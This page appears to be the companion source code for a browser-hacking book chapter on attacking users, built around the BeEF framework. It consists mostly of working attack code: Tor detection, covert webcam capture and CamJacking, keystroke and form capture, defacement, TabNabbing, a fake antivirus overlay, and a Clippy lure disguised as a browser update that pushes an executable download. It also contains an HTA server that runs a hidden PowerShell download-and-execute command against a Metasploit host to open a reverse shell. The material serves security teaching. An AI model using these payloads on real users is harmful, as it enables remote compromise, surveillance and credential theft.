BHH logo

Ch5 Source Code - Attacking Users


beef.net.send and beef.dom.attachApplet API functions

For the following two functions referenced in Ch05:
beef.net.send
beef.dom.attachApplet

Have a look at the BeEF GIT repo:
https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L110
https://github.com/beefproject/beef/blob/master/core/main/client/dom.js#L377

Detect Tor

BeEF's detect_tor module configuration:

class Detect_tor < BeEF::Core::Command

    def self.options
        return [
            {'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'},
            {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
        ]
    end

    def post_execute
        return if @datastore['result'].nil?
        save({'result' => @datastore['result']})
    end

end

BeEF's detect_tor module source:

beef.execute(function() {

	if (document.getElementById('torimg')) {
		return "Img already created";
	}

	var img = new Image();
	img.setAttribute("style","visibility:hidden");
	img.setAttribute("width","0");
	img.setAttribute("height","0");
	//img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
	//img.src = 'http://xycpusearchon2mc.onion/deeplogo.jpg'
	img.src = '<%= @tor_resource %>';
	img.id = 'torimg';
	img.setAttribute("attr","start");
	img.onerror = function() {
		this.setAttribute("attr","error");
	};
	img.onload = function() {
		this.setAttribute("attr","load");
	};

	document.body.appendChild(img);

	setTimeout(function() {
		var img = document.getElementById('torimg');	
		if (img.getAttribute("attr") == "error") {
			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not behind Tor');
		} else if (img.getAttribute("attr") == "load") {
			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is behind Tor');
		} else if (img.getAttribute("attr") == "start") {
			beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser timed out. Cannot determine if browser is behind Tor');
		};
		document.body.removeChild(img);
		}, <%= @timeout %>);

});

HTML5 WebCam capture

<html>
<head><title>HTML5 Webcam Capture</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>Make sure you accept the dialog!</h1>
	<video autoplay id="vid_el" style="display:none;" />
	<canvas id="can_el" style="display:none;" />
	<p id="output"></p>
<script>
$(document).ready(function() {

	var can = $('#can_el').get(0);
    var ctx = can.getContext('2d');

    var localMediaStream = null;

    var cap = function() {
        if (localMediaStream) {
            ctx.drawImage(vid_el,0,0);
            $('#output').html('image='+can_el.toDataURL('image/png'));
        } else {
            $('#output').html('result=something went wrong');
        }
    };

    window.URL = window.URL || window.webkitURL;
    navigator.getUserMedia  = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;

    navigator.getUserMedia({video:true},function(stream) {
    	vid = $('#vid_el').get(0);
        vid.src = window.URL.createObjectURL(stream);
        localMediaStream = stream;
        setTimeout(cap,2000);
    });
});
</script>

</body>
</html>

CamJacking (Egor Homakov technique)

cam.swf file: SWF file

SWF embed page:


<html>
<head>
<title>Sakurity babies</title>
<!-- Works with Chrome <= 28  -->
</head>
<body>
<script>
function update_image(){
  girl.src="./mycrush"+(Math.floor(Math.random()*9)+1)+".jpg";
}
setInterval(update_image, 3000);
window.onload=update_image;

</script>
<img style="opacity:0.5" id="girl">
<img style="position:absolute;left:200px;top:300px;" src="./play_white.png">

<object style="opacity:0.0;position:absolute;top:129px;left:100px;"  width="270" height="270">
<param name="movie" value="cam.swf">
<embed src="cam.swf" width="270" height="270"></embed>
</object>
<br />
<a href="http://homakov.blogspot.ru/2013/06/camjacking-click-and-say-cheese.html">how it works</a>
</body>
</html>

Capture user input - blur/focus capture

<html>
<head><title>Blur / Focus Capturing</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. If you lose and re-focus - you'll see events written to the page.</h1>
	<p id="output"></p>
<script>
$(document).ready(function() {
	$(window).focus(function(event) {
	  $('#output').html($('#output').html() + "Focused<br />");
	}).blur(function(event) {
	  $('#output').html($('#output').html() + "Blurred<br />");
	});	
})



</script>

</body>
</html>

Capture user input - form capture

<html>
<head><title>Form Capturing</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. Start typing...</h1>
	<form method="post" action="/">Username: <input type="text" value="username" /><br />
		Password: <input type="password" value="password" /><br />
		<input type="submit" value="Test - dont use actual passwords!" />
	</form>
<script>
$(document).ready(function() {
	$('form').submit(
  		function(e) {
		    e.preventDefault();
		    var values = "";
		    var data = "";
		    for (var i = 0; i < e.target.elements.length; i++) {
		      values += "["+i+"]";
		      values +=e.target.elements[i].name;
		      values +="="+e.target.elements[i].value+"\n";
		    }
		    data = 'Action: '+$(e.target).attr('action');
		    data += ' - Method: '+$(e.target).attr('method');
		    data += ' - Values:\n'+values;
		    alert(data);
		}
	);
});


</script>

</body>
</html>

Capture user input - keypress capture

<html>
<head><title>Keypress Capturing</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. Start typing...</h1>
	<p id="output"></p>
<script>
$(document).ready(function() {
	$(document).keypress(
  		function(e) {
  			$('#output').html($('#output').html()+"Which: "+e.which+", fromCharCode: "+String.fromCharCode(e.which)+", alt: "+e.altKey+", ctrl: "+e.ctrlKey+", shift: "+e.shiftKey+"<br />");	
  		}
	);

});


</script>

</body>
</html>

Capture user input - mouse click capture

<html>
<head><title>Mouse Click Capturing</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. Click anywhere in the page.</h1>
	<p id="output"></p>
<script>
$(document).ready(function() {
	$(document).click(function(event) {
  		$('#output').html("pageX: "+event.pageX+", pageY: "+event.pageY+"<br />clientX: "+event.clientX+", clientY: "+event.clientY+"<br />screenX: "+event.screenX+", screenY: "+event.screenY);
	});
});


</script>

</body>
</html>

Get the hooked page HTML

<html>
<head><title>This is a test title</title></head>
<body>

	<h1>This is the body of the page - that will be overwritten.</h1>
<script>

function go() {
  document.body.innerHTML = "OVERWRITTEN";
  document.title = "OVERWRITTEN";

}

</script>

<input type="button" onclick="go();" value="overwrite" />
</body>
</html>

Defacement example #1

<html>
<head><title>This is a test title</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page.</h1>
	<p>This paragraph will be overwritten</p>
<script>

function go() {
 var result = $('p').each(function() {
    $(this).html('OVERWRITTEN');
  }).length;

  alert("result=Defaced " + result +" elements");
 

}

</script>

<input type="button" onclick="go();" value="overwrite" />
</body>
</html>

Defacement example #2

<html>
<head><title>This is a test title</title></head>
<body>

	<h1>This is the body of the page - that will be alerted upon execution of the JavaScript</h1>
<script>
try {
    var html_head = document.head.innerHTML.toString();
  } catch (e) {
    var html_head = "Error: document has no head";
  }
  try {
    var html_body = document.body.innerHTML.toString();
  } catch (e) {
    var html_body = "Error: document has no body";
  }

 alert('head='+html_head+'&body='+html_body);

</script>
</body>
</html>

HTA (HTML Application)

Non-malicious example (spawning calc.exe)

require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'

class Hta < Sinatra::Base
  before do
    content_type 'application/hta'
  end

  get "/application.hta" do
 "<script>new ActiveXObject('WScript.Shell').Run('calc.exe')</script>"
  end
end

@routes = {
    "/" => Hta.new
}

@rack_app = Rack::URLMap.new(@routes)
@thin = Thin::Server.new("0.0.0.0", 4000, @rack_app)

Thin::Logging.silent = false
Thin::Logging.debug = true

puts "[#{Time.now}] Thin ready"
@thin.start

Malicious example (reverse shell through powershell)

require 'rubygems'
require 'thin'
require 'rack'
require 'sinatra'

class Hta < Sinatra::Base
    before do
        content_type 'application/hta'
    end

    # http://192.168.0.4:8080/anti is metasploit running the psh_web_delivery module
    # target: Win7(x86) IE 10
    # add "set AutoRunScript post/windows/manage/smart_migrate" to the module option in MSF.
    get "/app" do
    "<script>
    var c = \"cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c \\\"\\\"IEX ((new-object net.webclient).downloadstring('http://192.168.0.4:8080/anti'))\\\"\\\"\";
    new ActiveXObject('WScript.Shell').Run(c);
    </script>"
    end

end

# we can serve 2 different payloads, one for x86 and another for x86_64 Windows system.
# the fingerprinting can be instead done with BeEF, in order to serve an HTA with a link to a proper payload.
class Shellcode < Sinatra::Base
    before do
        content_type 'text/plain'
    end

    get "/payload" do
    result = File.read("powershell_code")
    end
end

@routes = {
"/hta" => Hta.new,
"/sc" => Shellcode.new
}

@rack_app = Rack::URLMap.new(@routes)
@thin = Thin::Server.new("0.0.0.0", 4000, @rack_app)

Thin::Logging.silent = false
Thin::Logging.debug = true

puts "[#{Time.now}] Thin ready"
@thin.start

JavaPayload

You can get the sources of Java Payload from Michael Schierl Github repository:
https://github.com/schierlm/JavaPayload

Social Engineering - Heretic Clippy (BeEF module source)

beef.execute(function() {
  
/**
 * Heretic Clippy
 * @version 1.0.0
 * @author sprky0
 * @modified vt & denden
**/

function __clippyboot(run) {
	var _run = run;
	if (!document.getElementsByTagName("body")[0]) {
		setTimeout(function(){__clippyboot(_run);},10);
	} else {
		_run();
	}
}

var GUID = {base:"_",cur:0,get:function(){this.cur++;return this.base+this.cur;}}

var HelpText = function(_question,reusable) {
	this.question = _question;
	this.options = [];
	this.key = GUID.get();
	this.views = 0;
	this.reusable = (reusable === true);
	this.timeout = {};
	return this;
}
HelpText.prototype.available = function() {
	return (this.views < 1 || this.reusable === true);
}
HelpText.prototype.addResponseURL = function(_text,_url) {
	this.options.push({text:_text,URL:_url,rel:"external"});
	return;
}
HelpText.prototype.addResponse = function(_text,_callback) {
	this.options.push({text:_text,callback:_callback,rel:"internal"});
	return;
}
HelpText.prototype.addTimeout = function(_timeout,_callback) {
	this.timeout = {callback:_callback,timeout:_timeout};
}
HelpText.prototype.getKey = function() {return this.key;}
HelpText.prototype.toString = function() {
	return this.question;
}
HelpText.prototype.toString = function() {
	return this.getKey();	
}
HelpText.prototype.toElements = function() {

	this.views++;

	var div = document.createElement('div');
	var p = document.createElement('p');
	p.innerHTML = this.question;
	div.appendChild(p);

	for(var i = 0; i < this.options.length; i++) {
		var button = document.createElement('button');
		button.innerHTML = this.options[i].text;
		if (this.options[i].rel == "internal")
			button.onclick = this.options[i].callback;
		else {
			var _Option = this.options[i];
			button.onclick = function(){
				window.location = _Option.URL;
			}
		}
		div.appendChild(button);
	}

	if (this.timeout.callback && typeof(this.timeout.callback) == "function") {
		setTimeout(this.timeout.callback, (this.timeout.timeout ? this.timeout.timeout : 500));
	}

	return div;
}

/* CLIPPY Display */
var ClippyDisplay = function(options) {

	this.file_dir = (options.file_dir) ? options.file_dir : "";

	this.div = document.createElement('div');
	this.div.style.zIndex = 1000000;
	this.div.style.width = "102px";
	this.div.style.height = "98px";
	this.div.style.backgroundColor = "transparent";
	this.div.style.position = "absolute";
	this.div.style.bottom = 0;
	this.div.style.color = "black";
	this.div.style.right = "60px";
	this.div.style.display = "inline";

	if (navigator.userAgent.match(/MSIE/)) {
		this.div.style.filter = "revealTrans(transition=12,duration=1.8)";
	}
	else {
		var img = new Image();
			img.src = this.file_dir + "clippy-main.png";
			img.style.position = "relative";
			img.style.display = "block";
			img.id = "clippyid";

		this.div.appendChild(img);
	}

	this.div.style.opacity = (options.visible === false) ? 0 : 1;

	return this;
}
ClippyDisplay.prototype.getElement = function() {
	return this.div || null;
}
ClippyDisplay.prototype.fadeIn = function(duration,options) {

	var _clipple = this;

	if (!options) 
		options = {};
	if (!options.step)
		options.step = 1 / 200;
	if (!options.value)
		options.value = 0;
	if (!options.remain)
		options.remain = 199;
	if (!options.increment)
		options.increment = duration / 200;

	options.remain--;
	options.value += options.step;
	
	if (navigator.userAgent.match(/MSIE/)) {
		imgfile = _clipple.file_dir + "clippy-main.png";
		_clipple.div.filters[0].Apply();
		_clipple.div.innerHTML="<img src='"+imgfile+"' />";
		_clipple.div.filters[0].Play();
	}
	else {
		_clipple.div.style.opacity = options.value;
		if (options.remain > 0) { setTimeout(function(){_clipple.fadeIn(duration,options);}, options.increment); }
	}

	return;
}


ClippyDisplay.prototype.fadeOut = function(duration,options) {

	var _clipple = this;

	if (!options) 
		options = {};
	if (!options.step)
		options.step = 1 / 200;
	if (!options.value)
		options.value = 1;
	if (!options.remain)
		options.remain = 199;
	if (!options.increment)
		options.increment = duration / 200;

	options.remain--;
	options.value -= options.step;
	_clipple.div.style.opacity = options.value;
	


	if (navigator.userAgent.match(/MSIE/)) {
		document.body.removeChild(document.getElementById("pipes"));
	}
	else {
		if (options.remain > 0) { 
			setTimeout(function(){_clipple.fadeOut(duration,options);}, options.increment); 
		}	
		else{ 
			document.body.removeChild(document.getElementById("pipes"));
		}
	}

	return;
}


/** SPEECH BUBBLE **/

var PopupDisplay = function(o,options) {

	this.file_dir = (options.file_dir) ? options.file_dir : "";

	if (typeof(o) === "string") {
		p = document.createElement('p');
		p.innerHTML = o;
		o = p;
	}

	this.div = document.createElement('div');
	this.div.style.zIndex = 1000000;
	this.div.style.width = "130px";
	this.div.style.height = "auto";
	this.div.style.backgroundColor = "transparent";
	this.div.style.color = "black";
	this.div.style.position = "absolute";
	this.div.style.bottom = "85px";
	this.div.style.right = "55px";
	this.div.style.display = "block";

	var imgTop = new Image();
	imgTop.src = this.file_dir + "clippy-speech-top.png";
	imgTop.style.position = "relative";
	imgTop.style.display = "block";
	this.div.appendChild(imgTop);

	this.message = document.createElement('div');
	this.message.style.background = "transparent url('" + this.file_dir + "clippy-speech-mid.png') top left repeat-y";
	this.message.style.padding = "8px";
	this.message.style.font = "11.5px Arial, Verdana, Sans";
	this.message.appendChild(o);

	this.div.appendChild(this.message);

	var imgBottom = new Image();
	imgBottom.src = this.file_dir + "clippy-speech-bottom.png";
	imgBottom.style.position = "relative";
	imgBottom.style.display = "block";
	this.div.appendChild(imgBottom);

	return this;
}
PopupDisplay.prototype.close = function() {
	try {
		var div = this.getElement();
		if (div != null && div.parentNode) {
			div = div.parentNode;
			div.removeChild(this.getElement());
		}
	} catch(e) {
		// alert(e)
	}
}
PopupDisplay.prototype.getElement = function() {
	return this.div;
}


/** CLIPPY controller **/

var Clippy = function(_homeSelector,file_dir) {
	this.help = {};
	// What options are OK to use as an introductory question?
	this.firstlines = [];
	this.homebase = this.findHomeBase(_homeSelector);
	this.timer = false;
	this.file_dir = file_dir;
	return this;
}
Clippy.prototype.findHomeBase = function(selector) {

	if (!selector)
		selector = "body";

	var ref = false;
	
	if (selector.charAt(0)=="#") {
		ref = document.getElementById(selector);
	} else {
		ref = document.getElementsByTagName(selector)[0];

		var div = document.createElement("div");

		div.style.zIndex = 9999999;
		div.id = "pipes";
		div.style.width = "300px";
		div.style.height = "300px";
		div.style.backgroundColor = "transparent";
		div.style.position = "fixed";
		div.style.bottom = "0";
		div.style.right = "0";
		
		ref.appendChild(div);

		return div;
	
	}
	
	beef.debug(ref);
	
	return ref;
}
Clippy.prototype.run = function(opt) {

	var _c = this;

	this.character = new ClippyDisplay({
		file_dir : this.file_dir,
		visible : false
	});
	this.homebase.appendChild( this.character.getElement() );
	this.character.fadeIn(1000);

	var Help = new HelpText("<%== @askusertext %>");
		Help.addResponse("Yes", function(){ _c.hahaha(); } );
		Help.addResponse("Not now", function(){  _c.killClippy(); setTimeout(function() { new Clippy("body","<%== @clippydir %>").run(); },"<%== @respawntime %>");  } );
	this.addHelp(Help,true);

	// initial wait
	this.talkLater();

}
Clippy.prototype.killClippy = function(){

		this.closeBubble();
		this.character.fadeOut(1000);
}
Clippy.prototype.hahaha = function() {
	
		var div = document.createElement("div");
		var _c = this;
		div.id = "heehee";
		div.style.display = "none";
		div.innerHTML="<iframe src='<%== @executeyes %>' width=1 height=1 style='display:none'></iframe>";
		
		document.body.appendChild(div);
		_c.openBubble("<%== @thankyoumessage %>");
		setTimeout(function () { _c.killClippy(); }, 5000); 
		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');

}
Clippy.prototype.addHelp = function(_help, is_startphrase) {
	this.help[ _help.getKey() ] = _help;
	if (is_startphrase)
		this.firstlines.push( _help.getKey() );

	return;
}
Clippy.prototype.sayOne = function(keys,alternative) {

	var found = false, count = 0;
	
	while(count < keys.length) {
		var choice = parseInt( Math.random() * keys.length );
		if( this.canSay( keys[choice]) ) {
			this.say(keys[choice]);
			return;
		}
		count ++;
	}

	return;
}
Clippy.prototype.canSay = function(key) {
	return this.help[ key ].available();
}
Clippy.prototype.say = function(key,alternative) {

	if (this.timer != false) {
		try {
			clearTimeout(this.timer);
			this.timer = false;
		} catch(e) {}
	}

	if(typeof(key) !== "string" && key.length)
		this.sayOne(key,alternative);

	this.openBubble( this.help[ key ].toElements() );
}
Clippy.prototype.firstLine = function() {
	this.sayOne(this.firstlines);	
}
Clippy.prototype.talkLater = function() {
	this.closeBubble(); 
	var _c = this;
	this.timer = setTimeout( function() { _c.firstLine(); }, 2000);
}
Clippy.prototype.openBubble = function(_o) {

	if (typeof(_o)=="string") {
		var o = document.createElement("p");
		o.innerHTML = _o;
	} else {
		var o = _o;
	}

	if (this.bubble) {
		this.bubble.close();
	}

	this.bubble = new PopupDisplay(o,{file_dir:this.file_dir});
	this.homebase.appendChild(this.bubble.getElement());

}
Clippy.prototype.closeBubble = function() {
	if (this.bubble) {
		this.bubble.close();
	}
}

/* APPLICATION LOGIC: */
// function clippy_boot() {if(document.getElementsByTagName("BODY").length === 0) {setTimeout("clippy_boot()",1);} else {clippy_main();}return;}
// function clippy_main() {var c = new Clippy("homebase","./").run();}
/* GO! */
// clippy_boot();

__clippyboot(function(){new Clippy("body","<%== @clippydir %>").run();});

});

Social Engineering - Heretic Clippy (BeEF module configuration)

#
# Copyright (c) 2006-2013 Wade Alcorn - [email protected]
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Clippy < BeEF::Core::Command
  
  def self.options
    return [
        {'name' =>'clippydir', 'description' =>'Webdir containing clippy image', 'ui_label'=>'Clippy image', 'value' => 'http://clippy.ajbnet.com/1.0.0/'},
        {'name' =>'askusertext', 'description' =>'Text for speech bubble', 'ui_label'=>'Custom text', 'value' => 'Your browser appears to be out of date. Would you like to upgrade it?'},
        {'name' =>'executeyes', 'description' =>'Executable to download', 'ui_label'=>'Executable', 'value' => 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'},
        {'name' =>'respawntime', 'description' =>'', 'ui_label'=>'Time until Clippy shows his face again', 'value' => '5000'},
        {'name' =>'thankyoumessage', 'description' =>'Thankyou message after downloading', 'ui_label'=>'Thankyou message after downloading', 'value' => 'Thanks for upgrading your browser! Look forward to a safer, faster web!'}
    ]
  end
  
  #
  # This method is being called when a zombie sends some
  # data back to the framework.
  #
  def post_execute
    save({'answer' => @datastore['answer']})
  end
  
end

Social Engineering - Crappy Prompt

<html>
<head><title>Crappy Prompt</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<p id="output"></p>
	
<script>
$(document).ready(function() {

	go = function() {
        // obviously answers should be input validated :D
		var answer = prompt("Enter your password:");
		$('#output').html($('#output').html() + "You wrote: " + answer + "<br />");
	}
});

</script>
<input type="button" value="click me" onclick="go();" />

</body>
</html>

Social Engineering - Fake AntiVirus

Fake AV image: fakeav.png

<html>
<head><title>Fake AV</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page.</h1>
	
<script>
$(document).ready(function() {

function grayOut(vis) {
  var dark=document.getElementById('darkenScreenObject');
  if (!dark) {
    var tbody = document.getElementsByTagName("body")[0];
    var tnode = document.createElement('div');
        tnode.style.position='absolute';
        tnode.style.top='0px';
        tnode.style.left='0px';
        tnode.style.overflow='hidden';
        tnode.style.display='none';
        tnode.id='darkenScreenObject';
    tbody.appendChild(tnode);
    dark=document.getElementById('darkenScreenObject');
  }
  if (vis) {
    var opacity = 70;
    var opaque = (opacity / 100);
    dark.style.opacity=opaque;
    dark.style.MozOpacity=opaque;
    dark.style.filter='alpha(opacity='+opacity+')';
    dark.style.zIndex=100;
    dark.style.backgroundColor='#000';
    dark.style.width='100%';
    dark.style.height='100%';
    dark.style.display='block';
  } else {
     dark.style.display='none';
  }
}

function avpop() {
  avdiv = document.createElement('div');
  avdiv.setAttribute('id', 'avpop');
  avdiv.setAttribute('style', 'width:754px;height:488px;position:fixed;top:50%; left:50%; margin-left: -377px; margin-top: -244px; z-index:101');
  avdiv.setAttribute('align', 'center');
  document.body.appendChild(avdiv);
  avdiv.innerHTML= '<br><img id=\'avclicker\' src=\'fakeav.png\' />';
}

go = function() {
	grayOut(true);
	avpop();

	$('#avclicker').click(function(e) {

		alert("Bad things may occur here"); 

	  $('#avpop').remove();
	  grayOut(false);
	});
}

});
</script>
<input type="button" value="Launch fake AV" onclick="go();" />
</body>
</html>

FullScreen Overlay IFrame

<html>
<head><title>Full screen iframe</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page.</h1>
	<a href="http://slashdot.org/">This is a link to slashdot - click me</a>
	
<script>
$(document).ready(function() {

	function createIframe(type, params, styles, onload) {
	  var css = {};
	  if (type == 'hidden') { 
	    css = $().extend(true, {
	      'border':'none', 'width':'1px', 'height':'1px',
	      'display':'none', 'visibility':'hidden'},
	    styles);
	  }
	  if (type == 'fullscreen') { 
	    css = $().extend(true, {
	      'border':'none', 'background-color':'white', 'width':'100%',
	      'height':'100%',
	      'position':'absolute', 'top':'0px', 'left':'0px'},
	    styles); 
	    $('body').css({'padding':'0px', 'margin':'0px'});
	  }

	  var iframe = $('<iframe />').attr(params).css(css).load(onload).prependTo('body');

	  return iframe;
	}

	$('a').click(function(event) {
	  if ($(this).attr('href') != '') {
	    event.preventDefault();
	    createIframe('fullscreen',
	      {'src':'http://beefproject.com/'},
	      {},
	      null
	    );
	    $(document).attr('title',"BeEFEEFFF");
	    document.body.scroll = "no";
	    document.documentElement.style.overflow = 'hidden';
	  }
	});

	
});
</script>
</body>
</html>

TabNabbing

<html>
<head><title>Nab this Tab!</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
</head>
<body>

	<h1>This is the body of the page. If you leave this tab for 30 seconds it'll change</h1>
	<p id="output"></p>
	
<script>
$(document).ready(function() {

	var url = "http://beefproject.com/";
	var wait = 30000;
	var tabnab_timer;

	$('#output').html($('#output').html() + "waiting for tab to become inactive<br />");

	// begin countdown when the tab loses focus
	$(window).blur(function(e) {
		begin_countdown();

	// stop countdown if the tab regains focus
	}).focus(function(e) {
		$('#output').html($('#output').html() + "timer killed - please change tab<br />");
		clearTimeout(tabnab_timer);
	});

	begin_countdown = function() {
		tabnab_timer = setTimeout(function() { window.location = url; }, wait);
	}
	
});
</script>
</body>
</html>

Abusing UI expectations on IE (Rosario Valotta attack)

Have a look at the BeEF module "ui_abuse_ie". It implements the attack adding a bunch of tricks
such as changing the fake-captcha based on the browser language and overriding the body onclick event
to spawn the popunder with the signed .exe.

https://github.com/beefproject/beef/blob/master/core/modules/social_engineering/ui_abuse_ie/command.js

WebRTC Camera Capture

<html>
<head><title>This will capture your cam and display in another tab</title></head>
<body>

<script>

// Build the video element
var video_element = document.createElement("video");
video_element.id = "vid_id";
video_element.style = "display:none;";
video_element.autoplay = "true";

// Build the canvas element
var canvas_element = document.createElement("canvas");
canvas_element.id ="can_id";
canvas_element.style = "display:none;";
canvas_element.width = "640";
canvas_element.height = "480";

// Add the elements to the document's body
document.body.appendChild(video_element);
document.body.appendChild(canvas_element);

// Returns a drawing context for the canvas element.
// We want a 2D rendering context, as opposed to a WebGL context (3D)
var ctx = canvas_element.getContext('2d');

// Define a null set variable for the stream
var localMediaStream = null;

// This function gets called AFTER we have the media stream setup
var captureimage = function() {
  // Checks that there is a non-null stream
  if (localMediaStream) {
    // Draw an image into the canvas from the video element
    // aligned to the top left corner (0,0)
    ctx.drawImage(video_element,0,0);

    // Send a data: URL back to the attacker with the encoded image
    // beef.net.send("<%= @command_url %>",
    //   <%= @command_id %>,
    //   'image='+canvas_element.toDataURL('image/png'));
	window.open(canvas_element.toDataURL('image/png'));
  } else {
    // Something didn't work
    // beef.net.send("<%= @command_url %>",
    //   <%= @command_id %>,
    //   'result=something went wrong');
	alert("Something went wrong");
  }
}

// Ensure we grab the correct window.URL object
window.URL = window.URL || window.webkitURL;

// Ensure we grab the correct getUserMedia function
navigator.getUserMedia  = navigator.getUserMedia || 
                          navigator.webkitGetUserMedia ||
                          navigator.mozGetUserMedia ||
                          navigator.msGetUserMedia;

// Prompt for permission to grab the camera
// Then call the function(stream) function - if successful
navigator.getUserMedia({video:true},function(stream) {

  // set the video element to the URL representation of 
  // the media stream
  video_element.src = window.URL.createObjectURL(stream);

  // Copy the stream (this is checked in the captureimage func)
  localMediaStream = stream;

  // Execute the captureimage function in 2 seconds
  setTimeout(captureimage,2000);

}, function(err) {
  // Couldn't get stream
  // beef.net.send("<%= @command_url %>",
  //   <%= @command_id %>,
  //   'result=getUserMedia call failed');
	alert("Couldn't get stream");
});


</script>

</body>
</html>